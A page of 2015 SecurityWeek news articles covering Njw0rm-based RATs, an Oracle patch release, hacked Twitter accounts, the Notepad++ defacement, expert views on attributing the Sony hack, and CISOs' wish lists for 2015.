December 23, 2024

Njw0rm Source Code Used to Create New RATs

Posted on January 23, 2015 by in Security

Malware developers have used the source code of the remote access tool (RAT) Njw0rm to create two new RATs, researchers at Trend Micro reported on Thursday.

Njw0rm is a variant of njRAT, a tool believed to be developed by a Kuwait-based individual. In June 2014, Microsoft announced the results of an operation targeting njRAT (Bladabindi) and Njw0rm (Jenxcus). At the time, the company noted that cybercriminals could create their own versions of the malware because the necessary information and packages were available on public forums.

Trend Micro says the source code of Njw0rm was published on hacker forums in May 2013, after which cybercriminals started creating new pieces of malware based on the threat.

One of the new RATs is Kjw0rm. Version 2.0 of the malware was first spotted by the security firm in January 2014. Kjw0rm 0.5X and a new worm dubbed Sir DoOom emerged in December 2014.

njRAT evolution

The new pieces of malware come with an enhanced control panel and they include several new features not seen in Njw0rm. In addition to information on the victim’s IP address, location, operating system, and USB devices, Kjw0rm’s control panel includes data on installed antiviruses (v2.0) and the presence of the .NET framework (v0.5x). Sir Do0om, on the other hand, also provides the botmaster with information on RAM, firewalls, antiviruses, CPU/GPU, and product details (name, ID, key).

As far as functions are concerned, Njw0rm can execute commands and files, steal credentials, and receive updates from the attacker. The Kjw0rm RATs allow their master to shut down or restart the computer, open Web pages, and download and execute files and code.

Sir Do0om is even more interesting since it can be used to mine Bitcoin, launch DDoS attacks, control computers based on a timer, display messages, terminate antivirus processes, and open a website related to Quran, the central religious text of Islam. This RAT is also designed to terminate itself if the presence of a virtual machine is detected.

Just like Njw0rm, the new threats are designed to propagate via removable devices. They hide some or all the folders found on the infected device and create shortcut links pointing to the malware with the names of the hidden folders.

“This evolution shows that the malware authors are becoming more active in developing new malware and using njw0rm as a template. Because of this pattern, we can expect to see more variants of this malware in the future,” Trend Micro threat response engineer Michael Marcos said in a blog post.

Subscribe to the SecurityWeek Email Briefing

view counter

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Oracle Releases Massive Security Update

Posted on January 20, 2015 by in Security

Oracle has pushed out a massive number of patches in a security update, including critical fixes for Java SE and the Oracle Sun Systems Products Suite.

Overall, the update contains nearly 170 new security vulnerability fixes, including 36 for Oracle Fusion Middleware. Twenty-eight of these may be remotely exploitable without authentication and can possibly be exploited over a network without the need for a username and password. 

Oracle Security LogoThe most serious of the bugs however impact Java SE, Fujitsu M10-1, M10-4 and M10-4S. In the case of Java SE, a CVSS Base Score of 10.0 was reported for four distinct client-only vulnerabilities (CVE-2014-6601; CVE-2015-0412; CVE-2014-6549; and CVE-2015-0408).

“Out of these [Java] 19 vulnerabilities, 15 affect client-only installations, 2 affect client and server installations, and 2 affect JSSE installations,” blogged Oracle Software Security Assurance Director Eric Maurice. “This relatively low historical number for Oracle Java SE fixes reflect the results of Oracle’s strategy for addressing security bugs affecting Java clients and improving security development practices in the Java development organization.”

In the case of the Oracle Sun Systems Products Suite, CVE-2013-4784 has a CVSS rating of 10.0 and affects XCP Firmware versions prior to XCP 2232. Overall, there are 29 security fixes for the suite.

The update also includes eight new security fixes for Oracle Database Server, none of which are remotely exploitable without authentication. Oracle MySQL has nine security fixes. There are also: 10 fixes for Oracle Enterprise Manager Grid Control; 10 for Oracle E-Business Suite; six for the Oracle Supply Chain Products Suite; seven security fixes for Oracle PeopleSoft products; 17 for Oracle Siebel CRM; one for Oracle JD Edwards Products; two for Oracle iLearning; two for Oracle Communications Applications; one for Oracle Retail Applications; one for Oracle Health Sciences Applications and 11 new security fixes for Oracle Virtualization. 

“The challenge with the Oracle CPU is, quarter after quarter, there is so much in these advisories,” said Ross Barrett, senior manager of security engineering at Rapid7. “There are so many different, unrelated platforms, that administrators risk missing something that might apply specifically to a very niche version of hardware that might be in their environment.”

Subscribe to the SecurityWeek Email Briefing

view counter

Brian Prince is a Contributing Writer for SecurityWeek.

Previous Columns by Brian Prince:


SecurityWeek RSS Feed

Hackers Announce ‘World War III’ on Twitter

Posted on January 17, 2015 by in Security

Washington – Hackers took over the Twitter accounts of the New York Post and United Press International on Friday, writing bogus messages, including about hostilities breaking out between the United States and China.

One tweet posted under the UPI account quoted Pope Francis as saying, “World War III has begun.”

Another message delivered on the Post account said the USS George Washington, an aircraft carrier, was “engaged in active combat” against Chinese warships in the South China Sea.

The tweets were subsequently deleted.

A Post tweet later noted that “Our Twitter account was briefly hacked and we are investigating.”

The fake tweets were not just about war. One posted on UPI said “Just in: Bank of America CEO calls for calm: Savings accounts will not be affected by federal reserve decision.”

The Post is owned by Rupert Murdoch’s News Corp. Several media organizations have had their Twitter feeds hacked over the past two years including Agence France-Presse, the BBC and others.

A Pentagon official said the tweet about hostilities with China was “not true.”

Subscribe to the SecurityWeek Email Briefing

view counter

© AFP 2013


SecurityWeek RSS Feed

Notepad++ Site Hacked in Response to “Je suis Charlie” Edition

Posted on January 15, 2015 by in Security

The official website of the popular source code editor Notepad++ was hacked and defaced on Monday by hacktivists protesting against the recently released “Je suis Charlie” edition of the application.

Hackers of the Fallaga Team, a Tunisian group, breached and defaced a large number of French websites following the Charlie Hebdo incident in which 12 people were killed by two masked gunmen.

The website of Notepad++ (notepad-plus-plus.org) became a target after the release of version 6.7.4, “Je suis Charlie” edition.

The attackers defaced the website with a message in which they accused Notepad++ developers of saying that “Islam is terrorist.”

In a statement published on Thursday, Don Ho, the France-based developer of Notepad++, clarified that the hackers have not compromised the binaries of the “Je suis Charlie” edition because they are stored on a different server.

“The message of the defacement accused Notepad++ of inciting hatred towards Islam and accusing Islam of supporting terrorism. The statements of Notepad++ ‘Je suis Charlie’ edition support nothing but the freedom of expression and only that. The fact of Notepad++ supporting the ‘Je suis Charlie’ movement has nothing to do with any accusation towards a specific community,” Ho explained.

“In fact the ‘Je suis Charlie’ movement in France, as far as I can tell, deserves no label of racism or of Islamophobia. I have many Muslim friends who are for ‘Je suis Charlie’. And sincerely, I don’t think that two extremist fools can stand for all Muslims or Islam itself,” he added.

The developer highlighted that those who don’t like the “Je suis Charlie” edition can simply use version 6.7.3, which contains the same features and bug fixes.

Hundreds of French websites have been defaced over the past days. Islamist hackers started launching attacks after some members of the Anonymous hacktivist movement initiated an anti-jihadist campaign in response to the Charlie Hebdo shooting.

The Charlie Hebdo incident has given hacktivists a reason to deface websites, but it has also given cybercriminals the opportunity to lure unsuspecting users to their shady websites. Researchers at OpenDNS discovered a fake BBC News website earlier this week. The site was shut down before experts could determine its purpose, but it could have been used to serve malicious content, redirect users to other websites, or for click fraud purposes.

Subscribe to the SecurityWeek Email Briefing

view counter

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

Pro-ISIS Hackers Compromise U.S. CENTCOM Twitter, YouTube Accounts

Posted on January 12, 2015 by in Security

CyberCaliphate

Hackers supporting Islamic State jihadists briefly took control of the Twitter and YouTube accounts of the U.S. Central Command (CENTCOM), the Department of Defense confirmed Monday.

In the attack, hackers replaced the main banner for CENTCOM’s Twitter account with an image of a masked fighter along with the words “CyberCaliphate” and “I love you ISIS”.

The attackers Tweeted and posted a message to Pastebin saying, “You’ll see no mercy infidels. ISIS is already here, we are in your PCs, in each military base. With Allah’s permission we are in CENTCOM now. We won’t stop! We know everything about you, your wives and children. U.S. soldiers! We’re watching you!” 

The attackers also posted information and details on Military personnel and photos, including a phone directory of officers, which some say it out-of-date and already publically available.

“We can confirm that the US Central Command Twitter and YouTube accounts were compromised earlier today. We are taking appropriate measures to address the matter,” a Deparment of Defense representative said in a statement.

RelatedISIS Cyber Ops: Empty Threat or Reality?

The @CENTCOM Twitter account was suspended at the time of publishing, but the Department of Defense said that it has regained control of the compromised accounts.

“The account compromised was timed with the release of a couple of sensitive documents on Pastebin, which appears to have been designed to intimidate US soldiers,” Trey Ford, Global Security Strategist at Rapid7, told SecurityWeek. “One thing to note: the Sony document dumps were laced with malware, and I expect these files may also be part of a targeted malware campaign targeting military analysts and their families.”

“This attack looks to be the same actors as the WBOC and Albuquerque Journal‎ attacks last week,” Ian Amit, Vice President at ZeroFOX, said. “The verbiage is the same, the behavior is the same, the hashtags are the same — all indicators suggest this is the same group. The full extent of the damage: 3 Twitter accounts and 1 YouTube account.”

“Much of this appears to be simply scare tactics,” Amit added. “All of the “leaked” documents are in fact public domain, repackaged to look like a real data breach. These actors are trying to make themselves look more legitimate by threatening soldiers wives and claiming to have mobile access. In truth, they likely only stole a password, either through a phishing scam or a brute-force attack.”

On Sunday, European, US and Canadian security ministers said that increased Internet surveillance and tighter border checks were “urgently” needed to combat jihadist attacks of the sort that shocked Paris last week. 

U.S CENTCOM promotes cooperation among nations, responds to crises, and deters or defeats state and non-state aggression.

One of nine unified commands in the U.S. military, CENTCOM’s has an area of responsibility in the central area of the world consisting of 20 countries, including Afghanistan, Iran, Iraq, Jordan, Kazakhstan, Kuwait, Kyrgyzstan, Lebanon, Oman, Pakistan, Qatar, SaudiArabia, Syria, Tajikistan, Turkmenistan, United Arab Emirates, Uzbekistan, and Yemen.

The attacks against CENTCOM came just as President Obama give an address and announced a series of initiatives designed to enhance the nation’s cybersecurity and privacy environment.

Related: ISIS Cyber Ops: Empty Threat or Reality?

RelatedSocial Media a Key Element for Terror Groups

Subscribe to the SecurityWeek Email Briefing

view counter

Managing Editor, SecurityWeek.

Previous Columns by Mike Lennon:


SecurityWeek RSS Feed

Feedback Friday: Is North Korea Behind the Sony Hack?

Posted on January 9, 2015 by in Security

In late November, Sony Pictures Entertainment was hacked by a group calling itself Guardians of the Galaxy (GOP). What initially appeared to be another hacktivist attack, later turned out to be a sophisticated operation possibly orchestrated by a state actor.

Feedback Friday

The hackers’ activities came to light on November 24, when the computers of Sony employees started displaying an image of a skull accompanied by a warning message. In the following days, the hackers started leaking large amounts of information stolen from the entertainment giant’s networks. The leaked data included unreleased movies, private emails, the personal details of actors, financial and business information, and employee records (including medical information).

North Korea Cyber Attacks

North Korea was named a suspect after investigators found similarities between this attack and others believed to be carried out by Pyongyang. Shortly after, the hackers told Sony to erase all traces of The Interview, a comedy about a plot to assassinate North Korean leader Kim Jong-Un. Sony initially called off the release of the movie because of the hackers’ threats, but later decided to go ahead with the release on Christmas Day, as planned.

Sony has avoided pointing a finger at North Korea. United States authorities, on the other hand, say they’re certain North Korea is behind the attack, but they haven’t provided any proof to back their claims, except for the fact that the attackers used IP addresses “exclusively used by the North Koreans.”

North Korea has denied being responsible, but officials admitted that it might be the work of supporters furious over The Interview. Last week, the US imposed new sanctions on North Korea in retaliation for the attack on Sony. On Wednesday, Director of National Intelligence James Clapper claimed that he dined with the North Korean general who Clapper says was responsible for overseeing the attack against Sony, during a secret mission to Pyongyang two months ago.

Everyone agrees that attribution is tricky. Some believe US authorities are jumping to conclusions, but others say the FBI surely has other evidence, which they might never share with the public, to back their claims.

This topic will be debated by a panel of experts and moderated by The Wall Street Journal’s Danny Yadron at the Suits and Spooks DC conference on February 4-5 at the Ritz-Carlton, Pentagon City.

And the Feedback Begins…

Jeffrey Carr, President/CEO, Taia Global, Inc:

“The evidence that the FBI believes it has against the DPRK in the Sony attack stems from the data that it received on the Dark Seoul attack last year from the private sector. The FBI, the NSA, and the private security companies upon which they rely for information believe that any attack linked to a North Korean IP address must be one that is government sanctioned since North Korea maintains such tight control over its Internet and Intranet. That is the FBI’s single point of failure because while that might have been true prior to 2009, it isn’t true any longer.

 

Access to those blocks is relatively easy if you go in through China, Thailand, Japan, Germany or other countries where North Korea has strategic connections.

 

It simply isn’t enough for the FBI director to say “We know who hacked Sony. It was the North Koreans” in a protected environment where no questions were permitted. The necessity of proof always lies with the person who lays the charges. As of today, the U.S. government is in the uniquely embarrassing position of being tricked by a hacker crew into charging another foreign government with a crime it didn’t commit. I predict that these hackers, and others, will escalate their attacks until the U.S. figures out what it’s doing wrong in incident attribution and fixes it.”

Joshua Cannell, malware intelligence analyst at Malwarebytes Labs:

“Many people continue to speculate about who was really behind the cyberattack against Sony Pictures. We know the director of the F.B.I. has made it publicly clear that North Korea was to blame, and the fact that he’s pushing to declassify that information should tell the world that they have solid evidence to back it up. If we weren’t living in a time where the ability to trust a U.S. Intelligence agency hadn’t recently been questioned during the release of incriminating N.S.A. documents, most people would have likely accepted the F.B.I.’s statement as fact long ago. It seems that by releasing more information, the F.B.I. is hoping to regain the confidence placed in U.S. Intelligence.

 

You have to look at some of the details leading up to the hack in November. North Korean officials called the release of The Interview ‘an act of terrorism,’ and there was a Facebook group sending threats to Sony Pictures months before the movie’s release. When that was shut down, actors continued to use other methods to communicate their threats, like e-mail. Finally, the threats came to fruition, and simply saying ‘it wasn’t us’ at this point doesn’t do much when all of the evidence points at them. There may have been others involved, that’s true, but that doesn’t change the conclusion of a lengthy federal investigation.”

Jay Kaplan, CEO of Synack:

“The security pundits that we’ve seen in the media disagreeing with the government’s assertion of North Korean attribution are ill-informed with conclusions that I believe to be fundamentally flawed. Even with the latest revelation of details tying North Korea to the Sony breach by “slipping up”, there is much more under the covers that the public is not seeing (and will never see as a result of classified sources.) Conclusions made by security firms after reviewing methodology, technical capability, and modus operandi are flawed given their non-complete picture of the situation at hand.

 

It is especially interesting to see how just a few months ago the world thought the government had too much information — the intelligence community was running rampant, too much data was being siphoned, and the integrity of our privacy was in question. Yet today, post-Sony breach, people are questioning the same government for coming to conclusions due to a lack of knowledge and perspective.”

Ken Westin, senior security analyst, Tripwire:

“It is difficult if not impossible for those of us in the private sector to verify the FBI¹s findings without access to the information they have.

 

However, I think it is important to note that in this latest statement they are tying their attribution case to IP addresses they say were exclusively used by the North Koreans. I think it is important to point out that Comey said they were IP addresses exclusively used by the North Koreans and not IP addresses in North Korea. The IP addresses that were issued to the public in their flash advisories were IP addresses that have been seen before and used for spam and command and control by other criminal actors. This was a key reason many in the security community were skeptical of the findings, as based on the evidence provided there wasn’t exactly a smoking gun and the information was vague and inconclusive.

 

I would like to give the FBI the benefit of the doubt and assume that they have additional evidence aside from just IP addresses, which I think they must if they have the level of confidence that Comey is claiming. The difficult part of that for the security community is trusting the FBI. Trust does not come easily to this group, as by nature of their profession they are paranoid and skeptical and want to see the evidence for themselves to establish the facts.”

Suits and Spooks: Washington DC 2015
Suits and Spooks DC: Not Just a Conference, a Collision. Washington DC, Feb 4-5. See the Agenda & Register Today

Marc Gaffan, CEO & Co-founder of Incapsula:

“While we may never know the the motives behind the Sony Pictures attack, we’ve found that some attackers will publicly deny involvement, but leave breadcrumbs in an attempt to demonstrate prowess without taking the full brunt of public criticism. As for North Korea’s cyber espionage capabilities, despite the fact that their Internet capacity is less than half of the Falkland Islands, it would be foolhardy to equate a small Internet presence with a lack of skilled individuals working with or for their government.

 

Regardless of origin or motive, companies need to turn their focus to the blind spots in their organizations. Hackers will only continue to create more illusive and inventive ways to take down websites or steal information; our global networks see new methods every day. Sony Pictures learned their lesson, but will other companies? This remains to be seen.”

Michael Sutton, VP of Security Research, Zscaler:

“Attribution is hard. This is always the case when dealing with a cyber attack where IP addresses can be spoofed, proxies can be employed and digital weapons copied. Attribution is impossible when we don’t have all the facts. The FBI was surprisingly quick to finger the DPRK for the Sony attacks. Less than a month after the breach, the FBI confidently proclaimed that they had “enough information to conclude that the North Korean government is responsible for [the attacks]”.

 

Contrast that with the grand jury indictment of five Chinese Military officials charged last year with cyber espionage, a case which involved years of investigation. Why did the FBI move so quickly this time? Was it truly an open and shut case? Were there other political motivations for fingering North Korea? Without full transparency we’ll likely never know but we can presume that attribution was needed prior to retaliatory measures. Measures that have already publicly emerged in the form of US sanctions, but other more covert responses are no doubt also currently underway and unlikely to show up in the headlines.

 

Some have claimed that the DPRK did not have the means to conduct such a successful attack, but this is a country that has had an offensive cyber capability for many years and has shown a willingness to leverage it against foreign nations/companies. The Sony breach, while broad in terms of the damage caused, would not have required great sophistication if network admin credentials were indeed stolen and the target had poor internal controls to limit the reach of that individual’s network access. Given Sony’s poor history with previous attacks, including a 23 day DoS attack on the PlayStation Network in 2011, it’s not hard to fathom that internal security controls were lacking.”

Mike Tierney, COO at SpectorSoft:

“As the feeding frenzy around the possibility a nation was behind the Sony hack calms a bit, more and more credible experts are indicating that it is at least as likely that the hack and subsequent data dump were clearly designed to embarrass Sony. The fact that the tie between a pending movie release and the hack was originally made in news reports, and not by the hacker(s), lends some credence to the idea that there may be a more mundane, but all too common, perpetrator.

 

Very often, data leaks of this type stem from a disgruntled employee. Whether the source of their anger is specific, as in the case of a poor performance review or being passed over for a promotion, or more general, as in the case of rumored layoffs (which seem to be a possibility in the Sony case), disgruntled employees can and do present significant risk to organizations.”

Greg Martin, CTO at ThreatStream:

“The big issue with the Sony hack is that any “Security Expert” outside of the core investigation can claim an “alternate theory.”

 

This has been highly confusing to the public who have been hungry for more details which the FBI finally came out with. The FBI had clear evidence that they have some ‘smoking gun’ data showing the North Korean hackers were sloppy when setting up their social media accounts.

 

This is a common mistake made by many hackers – even the very sophisticated ones – and it’s one of the more common ways they get caught. My question to the ‘truthers’ is: why is that so hard to accept?”

Tal Klein, VP of Strategy, Adallom:

“The trouble with breach attribution is that smoking guns are hard to come by. A more concerning issue to those of us watching from the sidelines is that the initial attack vector has still not been discovered, and no breach containment announcement has been made thus far. That means we don’t know whether the attackers still have a foothold in Sony’s infrastructure or if there are more exfiltrated data dumps coming.

 

It is strange that the U.S. would rush to point fingers at North Korea, especially given that any recourse would doubtlessly punish the hapless DPRK proletariat more than government or military. Further, it seems obvious in hindsight that the FBI’s most recent revelations, as presented, would not quell detractors’ call for solid attributable evidence—so one wonders, ‘Why bother?’”

Lior Div, CEO and Co-founder of Cybereason, a MalOps protection company:

“When a company is attacked, it reduces the liability and blame of the attacked company if the public believes it is a nation state attack. This attack may have very well been done or aided by insiders, or other players, including North Koreans that are not nation state cyber attackers, but…certainly the legal and PR fallout for Sony will be less severe if it was believed the attack was state sponsored terrorism as opposed to a disgruntled insider.

 

From all that we’ve read so far, we haven’t seen significant hints for attribution to North Korea as a nation-state sponsored attack. The FBI stated that the attackers were negligent, leaving evidence that ties the attack to North Korea, but in my experience hackers with the capacity to exfiltrate the amount of data involved in the Sony attack are very far from being negligent. It is quite possible that any indicators pointing to North Korea were intentional, left or intentionally planted in order to mislead investigators.

 

So either the FBI knows things that were not shared with the media (possible) that clearly proves it in NK, or – somebody is leveraging it for his own political purposes. That includes the US government, Sony, the hackers…really, we may never know…”

Brendan Spikes, CEO, Spikes Security:

“Given the dangers of using the web today, is it not unreasonable to assume that any network can be breached by web malware trojans? This could surely include servers thought to be used exclusively by North Koreans. I wouldn’t be so quick to assume that someone intending to frame NK for the Sony attack could not intentionally leave breadcrumbs leading back to compromised NK servers.”

TaaSera CTO, Vice President and Founder, Srinivas Kumar:

“Attacker attribution requires reliable information to analyze how the breach was orchestrated internally, identifying the origin of the malicious code (supply chain), and finally tracking down the location of the attackers. The warrant required in a breach investigation to convict the cyber criminals must provide credible evidence as assurance that no evasion techniques were detected, including use of Tor networks, Fast flux DNS, and IP address spoofing. Further, for long duration and high volume data haul, determination of the corpus of actors by geo-location may be an authoritative assertion of the locality or distribution of the attackers.

 

Most investigations today that typically follow in the wake of high profile breaches rely on static geo-location markers for the network addresses and domain names linked to the security episode. The availability of cloud computing services, elastic IPs, Tor networks coupled with the dynamic domain name services, domain name and IP address fast flux warrant evidence beyond reasonable doubt to determine true actors (perpetrators).”

TK Keanini, CTO at Lancope:

“While attribution can be difficult in the physical world, it is incredibly tricky in the digital world. Not only are there effective tools to remain anonymous but there are equally as many tools to make it look like it is attributed to a certain source when it is actually another.

 

Conflict in simpler times was very symmetrical in that the red team versus the blue team but these days in the digital realm of the Internet, it is almost never that simple. an orange team can make it look like the red team is to blame for the attack on the blue team and from there it can grow even more complex. This asymmetrical pattern is the new pattern of cyber conflict and the sooner we all recognize it the better.

 

Ultimately there is an information layer that is adjacent to the physical world meaning at some point you do get back to a person or set of people who are behind the attacks. The synthesis and analysis that lead up to this is complex and not well understood by everyone. Those that understand the dynamics of information spaces are slow and cautious to point fingers as we have seen in the controversy around attribution the Sony Pictures attacks. Even when the culprit stands up, makes themselves known as the Guardian of Peace (GOP), law enforcement still struggles to ties it all back to the physical world where laws can be enforced.”

Ian Amit, Vice President of ZeroFOX:

“Attribution is always a dangerous game. Attackers leave plenty of red herrings to cover their footsteps and make following their trail next to impossible. This is exactly the case with Sony – a few lines of code or IP addresses indicate North Korea, making for a great story, but the actual attack could have come from anywhere.

 

In short, attribution is not a technology game, and trying to deduce attribution based on technical indicators is inherently flawed. If a hacker has deep access in the system, it is extremely easy to change the evidence in order to throw off the trail. What you find from a forensic perspective can mean a thousand different things all at once, based on little fragments of code here or there or the geographic location where an attack was routed though. All these red herrings mean is that attribution becomes political very quickly: any party can conduct their own analysis and come to a conclusion that suits their purposes, all supported by some pieces of incomplete technical evidence.”

Jason Lewis, Chief Collection and Intelligence Officer of Lookingglass Cyber Solutions:

“Attribution is an extremely complex challenge that requires the support of all forms of intelligence to include network, signals, physical, human, etc. In this case, let’s assume the attacker is highly skilled. A highly skilled attacker would understand that leaving false evidence would confuse investigators and lead them to conclusions that point away from themselves.

 

I view this scenario based on how I would compromise a target. First, I would be sure to have multiple launch points between my clandestine Internet connection and my target. That means I would chain multiple compromised hosts through a series of VPNs that encrypt all my traffic. If an investigator was able to trace from the target to my last launch point, they would only find evidence of my tunnel termination. All of my traffic would be passing through the host, never leaving a trace of my activity. If I was determined to frame a person or entity for my activity, I would certainly attempt to compromise a host on their network that was used by many other users, a proxy for example. My malicious traffic would be lost in the noise of thousands of other users.

 

Tracing activity back to me through my tunneled infrastructure may not be impossible, but it would be extremely difficult given that I’m focused on not being caught. If I accessed this network on multiple occasions, I would change the compromised hosts I used for my tunnels and never use the same combination twice. Every comment referencing attribution in the SONY attack introduces more questions.”

Don’t miss the upcoming panel “Sony and the DPRK: A Question of Attribution” at Suits and Spooks DC moderated by The Wall Street Journal’s Danny Yadron.

Until Next Friday…Have a Great Weekend!

Subscribe to the SecurityWeek Email Briefing

view counter

Previous Columns by Eduard Kovacs:


SecurityWeek RSS Feed

What CISOs, InfoSec Pros Have on Their 2015 Wish Lists

Posted on January 7, 2015 by in Security

CISO Wish List for 2015

Security experts weigh in on what they would like to see in 2015 to make their jobs wrangling users, infrastructure, and data easier.

The new year ahead is a good time to reflect on what infosec professionals need to keep users and data safe—before the inevitable race to stay ahead of the crises and firefighting begins in earnest. In previous years, SecurityWeek asked experts to talk about their security resolutions. This year, security experts weigh in on their 2015 wish list—things they would like to see happen in their organization and the security industry as a whole.

Information security is a tough job. There is an element of fortune telling to figure out where the next threats will come from, as well as continuous gate keeping to monitor everything that comes in and out of the organization.

Intent and motives matter, since the same action can be malicious, negligent, or benign based on the circumstances. Locking things down annoys users, so there has to be controls in place to let users do what they want while still maintaining a certain level of protection. When something goes wrong, such as the case of a failed compliance audit, regulatory investigation, data breach, cyber-attack, or data theft, there is always finger pointing and recriminations.

Faced with these challenges, what do CSOs/CISOs, information security practitioners, and other experts wish for? The gamut of responses ranged from the serious (implementing new controls) to humorous (a time machine). At the heart of all the responses was the recognition that security is visible and their jobs are on the line when things go wrong.

“If I was a practicing CISO right now, the very first thing on my wish list would be a ‘keep me from getting fired’ gift card,” said Eric Cowperthwaite, vice-president of advanced security and strategy at Core Security and the former CISO of Provident Health and Services. The card would be something CISOs can hand to the CEO after the inevitable attack, breach and theft of critical assets and say, “can’t fire me this time,” he said.

CISOs should demand access to the CEO and support of the senior executives in the company to define and protect the crown jewels, said Renee Guttmann, vice president of information risk management and member of the Accuvant Office of the CISO. Most CISOs want more attention and funding from the executive team—and a seat at the executive table to provide updates periodicall, said Guttmann, who formerly served as CISO at Coca-Cola. CISOs also want to be recognized as playing as critical a role within the organization as the CFO or COO.

CISO Board Access

“In 2015, CISOs will be asking for a corner office, with a view,” said Michael Daly, the CTO of Cybersecurity & Special Missions at Raytheon.

Talking to a Board Which ‘Gets’ Security

Most CISOs would love to switch the conversation with the board of directors from the whys of security to the hows. Even after the past year of almost non-stop breaches, it’s clear that the need to proactively implement good security is poorly understood—or simply ignored—at the highest levels of business, said Geoff Webb, senior director of solution strategy at NetIQ.

“If I could give every CISO on the planet a New Year’s wish, it would be to have that conversation changed from ‘Why should I invest in security’ to ‘How do we get the job done,’” said Webb.

CISOs want the support of their executive management to put in place the level of security consistent with the amount of risk the organization is willing to accept, said Marc Maiffret, CTO of BeyondTrust.

> Request an Invitation to the 2015 CISO Forum

Having the Industry Step Up

Several of the experts expressed their frustration on the state of the information security industry. “It’s clear that after Target, JPMC, Sony and many other highly publicized, massive attacks perpetuated in 2014, the industry needs new tools to find these attackers before they are able to successfully complete their damage,” said Mike Mumcuoglu, CTO and co-founder of LightCyber.

For years, CISO have been promised more effective security technology was on the way, and that they just needed to spend “just a little bit more” to significantly improve their security. “It hasn’t quite worked out the way it’s been promised,” said Ken Levine, CEO of Digital Guardian. CISOs should be asking for technology that works better than what’s been delivered to date for a price that reflects its actual value, he said. And that doesn’t mean yet another piece of technology blasting millions of alerts since it’s not possible to process them all.

“Memo to the security industry, giving me hundreds of thousands, if not millions of alerts is about as effective as giving me none,” Levine said. “Will you please tell me which alerts I need to worry most about!”

There is a lot of conversation about security analytics, but it’s still just a lot of promises and not enough reality. “This is all vendor hype as none of the technologies integrate enough of the products in my environment to make the data useful without me having to put asterisks next to the data in my presentations,” said Mike Davis, CTO of CounterTack.

It would be nice to have security reports that show the state of the organization that “don’t put people to sleep,” said Gil Zimmermann, CEO and co-founder of CloudLock.

It’s not just technology that needs to change—the way the industry treats standards also need to change as well, so that standards are actually treated as something that works across platforms and organizations. “Too many standards that aren’t interoperable between products prevents me from deploying different tools,” Davis said.

Along with standards, the industry needs to define security and risk metrics for making informed decisions and managing a security program. Other c-level executives have a set of metrics they can use to explain what they are doing and what the effects to the business are. At the moment, there is no consensus on key performance indicators or a widely adopted set of quantifiable metrics, so cyber-security decisions are “perceived as mere guess work by boards of directors and other corporate executives,” said Jonathan Trull, CISO of Qualys and former CISO of Colorado. The lack of trust in CSOs and security community as a whole is a major barrier to obtaining additional funding and resources.

“CISOs must be able to answer the question: For x amount of money spent on cyber security, what will be the return?” Trull said.

Cool Tools That Need to Exist

Along with asking for better security technology to make the day-to-day operations as well as overall risk management possible, security professionals have their own list of products that would make their jobs easier—and more fun.

Zimmerman said a “one-year paid membership to tech gadgets of the month club” would be a good thing for a CISO to have.

“A time machine so I can go back in time and make a bunch of different investment choices,” said Core Security’s Cowperthwaite.

“’X-Ray Data Goggles’ to give me a deep look into the network to determine where my critical or sensitive data is, what assets support the data, and what controls keep the data safe,” said Arlie Hartman, a consultant at Rook Security.

“’Information Security Pocket Translator’ to refine my message to the board, to speak their language, and enable the business to work within acceptable risks,” said Randy Wray, a consultant with Rook Security.

Having Necessary Tools on Hand

CISOs want to be able to proactively track specific adversaries as they “walk” their way through the network, said Rick Howard, CSO of Palo Alto Networks. By identifying indicators of compromise as part of an attack, CISOs will be able to determine their response. “In my perfect fantasy world, I would like to be able to track adversaries — criminals, spies, hacktivists, and ankle biters — by watching for sets of Indicators of Compromise at every link in the Kill Chain,” he said.

CISOs need the attacker profile, not the actual identity. If the attacker is a spy out to steal mergers and acquisitions documents, and those documents are on the organization’s network, then the internal security team should be on high alert. Otherwise, the team can deal with the threat without turning this into an emergency firefighting situation, he said.

Failing that perfect scenario, CSOs and CISOs should have technology configured correctly—oftentimes organizations discover too late the settings they thought they were getting weren’t turned on when the technology was initially turned on. “We spend gazillions of dollars to buy the latest and greatest, and yet fail to squeeze as much efficiency out of it as possible,” said Howard. While it may be more interesting to talk about nation-state attacks, CSOs need to focus on device configuration. “We should at least get that right before we move on to the sexy stuff.”

Target has set a very public precedent for financial liability in the case of a targeted attack on personal financial information. As a result, every major financial, retail, and online entity will be looking into cyber-insurance, said Mike Mumcuoglu, CTO and co-founder of LightCyber. Cost-effective data breach insurance will be on many CISO wish lists this year, he said.

Effective Collaboration With Others

Security is much more visible in that people are more aware and pay attention when something goes wrong, but it’s not yet viewed as a joint effort. There is still the sense that users do their own thing while the security folks in the backroom keep things humming. There needs to be formal agreements between business, IT, and security teams to integrate information security into the process instead of treating it as an add-on commodity, said Chris Blow, a consultant with Rook Security.

“It would be nice to have an IT team and user base that cares about security as much as the security team,” Zimmermann said. “Or being included in conversations about new technology developments, purchases, or deployments before final decisions are made.”

It would also help the CSO to have “better clarity from legal on what a breach is, what an incident is, and what we can safely ignore,” Davis said.

IT should “actually follow the security guidelines we built instead of always getting a risk waiver,” added Davis. The waiver means IT essentially says it understands the risks and doesn’t have to implement the proper controls or take specific tasks to resolve an issue. This doesn’t help the organization’s overall security. Vendors also need to think about security—whether it’s in their software development cycle, the patching system, or even maintaining their cloud infrastructure. “Tired of getting vendor software that isn’t secure and I can’t make secure,” he said.

Speaking of software development, proper tools are critical. All developers should have security training so that they think about security right from the design phase, said Steven Lipner, chairman of SAFECode and partner director of program management at Microsoft’s Trustworthy Computing group. Each developer in the organization should receive a full toolbox for static analysis, current compilers, and fuzzing tools to build code that contains even fewer vulnerabilities, and make it even harder to exploit any that remain, he said.

Legions of Experienced Folks

The biggest challenge for CISOs is not fighting for the ideal infosec budget, but finding and hiring employees with necessary skills and experience. CISOs want a “proper staff” of experienced and knowledgeable security professionals and are looking for the right people to handle the security fundamentals, Maiffret said.

CISOs want to hire staff who are focused on analytics and risk, not just running firewalls, Cowperthwaite said. This echoed CounterTack’s Davis, who noted that universities tend to focus on network security, not realizing that network security is not the same as IT security.

“It is only one slice of the problem,” Davis said.

Turning Wishes into Reality

As the old saying goes, “If wishes were horses…” CISOs may have a long list for what they would like to see, but they can’t just sit back and wait for their wishes to be granted. CISOs should make a New Year’s resolution to become a corporate business leader, said Trull. CISOs need to become more integrated into c-suite conversations, focus on the integration between DevOps and security teams, learn the business and understand the financials, and learn to speak the language of other executives including the ability to calculate and demonstrate a return on investment for cybersecurity spending.

